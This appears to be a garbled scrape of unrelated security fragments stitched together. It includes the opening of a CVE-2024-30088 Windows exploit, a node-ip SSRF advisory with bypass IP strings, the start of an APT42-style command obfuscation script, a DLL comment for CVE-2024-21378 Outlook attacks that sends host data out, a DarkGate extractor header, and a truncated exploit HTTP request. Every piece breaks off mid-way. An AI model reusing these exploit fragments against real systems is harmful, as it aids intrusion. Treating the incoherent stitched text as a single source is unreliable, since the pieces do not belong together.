This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//
// CVE-2024-30088 PoC - @carrot_c4k3 (exploits.forsale)
//
#include <stdio.h>
#include <assert.h>
#include <Windows.h>
// Some of these definitions were taken (and modified) from https://github.com/winsiderss/systeminformer
typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION
{
    BOOLEAN SecureKernelRunning : 1;
    BOOLEAN HvciEnabled : 1;
CVE-2024-29415 represents a significant security vulnerability in the node-ip package, a popular Node.js library used to retrieve IPv4 addresses. This library, instrumental in many server-side applications, has been identified as containing a serious flaw in its IP address classification function, isPublic(). This flaw can lead to Server-Side Request Forgery (SSRF) attacks when private IP addresses are misclassified as public.
Vulnerability Description
The core issue lies in the isPublic() function, which incorrectly identifies certain IP address formats as public, even when they represent private or reserved addresses. Notable examples of such misclassifications include:
127.1
01200034567
012.1.2.3
000:0:0000::01
::fFFf:127.0.0.1
# https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations/
import argparse
import random
import win32com.client

def insert_digit(word, digit):
    # Insert the digit at a random interior position of the word
    pos = random.randint(1, len(word) - 1)
    return word[:pos] + digit + word[pos:]

def generate_command(url, file_path):
Thank you to SpecterOps for supporting this research, to Elad for helping draft this blog, and to Sarah, Daniel, and Adam for proofreading and editing! Crossposted on the SpecterOps Blog.
What follows is the culmination of two years of research with funding by SpecterOps and contributions from many of my coworkers.
Special thanks are needed to Elad, Lee, Will, Daniel, and Kai. Elad, Lee, and Will have contributed several ideas to the project, which are documented here, and have each spent multiple days testing the tool. Daniel has answered all of my inevitable questions about AzureAD (whoops, now Ent
/**
 * This DLL is designed for use in conjunction with the Ruler tool for
 * security testing related to the CVE-2024-21378 vulnerability,
 * specifically targeting MS Outlook.
 *
 * It can be used with the following command line syntax:
 * ruler [auth-params] form add-com [attack-params] --dll ./test.dll
 * Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
 *
 * After being loaded into MS Outlook, it sends the PC's hostname and
import sys, pefile, validators, re, base64
'''
Author: Mohamed Ashraf (@X__Junior)
Usage:
    python3 darkgate.py path_to_sample
'''
def is_ascii(s):
    # True if every character is 7-bit ASCII or a NUL byte
    return all(ord(c) < 128 or ord(c) == 0 for c in s)
POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Content-Length: 416
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0
Connection: close

{"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{
"subprotocol":"h2",
Next Stage Download Domains: